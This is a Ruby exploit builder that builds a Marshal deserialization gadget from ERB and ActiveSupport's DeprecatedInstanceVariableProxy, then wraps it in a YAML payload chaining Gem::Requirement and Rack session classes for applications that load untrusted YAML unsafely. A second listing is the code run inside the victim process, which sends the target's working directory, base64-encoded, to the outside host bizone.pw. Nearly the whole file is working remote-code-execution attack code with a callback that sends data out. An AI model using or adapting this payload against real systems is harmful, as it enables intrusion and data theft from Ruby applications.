require "erb"
require "base64"
require "active_support"
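# Usage guard for the builder script (argument: path to the Ruby file that
# will be embedded as the gadget's ERB source, see below).
# Usage text goes to stderr and the exit status is non-zero, so a redirected
# stdout (`exploit_builder.rb > payload.yml`) never captures the usage line
# in place of the YAML document; `exit` rather than `exit!` lets at_exit
# handlers run, which `exit!` skips for no benefit here.
if ARGV.empty?
  warn "Usage: exploit_builder.rb <source_file>"
  exit 1
end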
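# Build the Marshal-able gadget.
#
# ERB.allocate skips ERB#initialize, so @src is never produced by compiling a
# template: whatever is read from <source_file> is stored verbatim as the
# "compiled" Ruby that ERB#result evals (@lineno is the line offset that eval
# reports). The input file must therefore be plain Ruby, not an ERB template.
erb = ERB.allocate
erb.instance_variable_set :@src, File.read(ARGV.first)
erb.instance_variable_set :@lineno, 1

# Wrap the ERB in a DeprecatedInstanceVariableProxy targeting :result. The
# proxy is expected to forward a method call to erb.result (and thus eval
# @src) the first time it is touched after Marshal.load on the target.
# NOTE(review): the constructor arity and the presence of this class depend
# on the ActiveSupport version installed on the target — confirm against it.
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result

# strict_encode64 rather than encode64: encode64 inserts a newline every 60
# characters, and those newlines would land inside the YAML double-quoted
# cookie scalar emitted below, where they are subject to line folding.
# NOTE(review): '+', '/' and '=' in the value may still be URL-unescaped by the
# target's cookie parser; this relies on its base64 decoder being lenient.
payload = Base64.strict_encode64(Marshal.dump(depr))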
# Emit the YAML wrapper for a target that YAML-loads untrusted input with the
# unsafe loader (object tags honoured). As written it nests:
#   Gem::Requirement -> requirements: [ Rack::Session::Abstract::SessionHash ]
#   whose `req` is a Rack::Request with env HTTP_COOKIE "a=<payload>", and
#   whose `store` is a Rack::Session::Cookie using the Base64::Marshal coder
#   for cookie key "a".
# The intent is that the session hash's lazy load reads cookie "a" through the
# Base64::Marshal coder, i.e. Marshal.load of `payload` — presumably triggered
# when Gem::Requirement's YAML/marshal hooks walk `requirements`. `secrets: []`
# means the cookie store is expected to skip signature verification.
# NOTE(review): the nesting shown here is emitted at column 0; Psych requires
# each child level to be indented deeper than its parent — confirm the exact
# indentation against the intended structure before relying on this output.
puts <<-PAYLOAD
---
!ruby/object:Gem::Requirement
requirements:
- !ruby/object:Rack::Session::Abstract::SessionHash
req: !ruby/object:Rack::Request
env:
rack.session: !ruby/object:Rack::Session::Abstract::SessionHash
loaded: true
HTTP_COOKIE: "a=#{payload}"
store: !ruby/object:Rack::Session::Cookie
coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
key: a
secrets: []
exists: true
PAYLOAD
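# Second listing: the <source_file> the builder embeds as the ERB's @src.
# It is eval'd by ERB#result inside the target process, so it must be plain
# Ruby (no ERB tags). It beacons the target's working directory to the
# listener as a base64-encoded query parameter.
require "base64"
# net/http (which also loads uri) is not guaranteed to be loaded in the target
# process; the original referenced URI/Net::HTTP without requiring them.
require "net/http"

out = Dir.pwd # same information as `pwd` without spawning a shell (no trailing newline)

url = URI.parse('http://bizone.pw')
url.path = '/'
# Form-encode the value so '+', '/' and '=' in standard base64 survive query
# parsing on the listener; the receiver decodes q with a normal base64 decode.
url.query = URI.encode_www_form('q' => Base64.strict_encode64(out))

# NOTE(review): a connection failure raises inside the target's request
# handling; rescue StandardError here if a silent failure is preferred.
Net::HTTP.get_response(url)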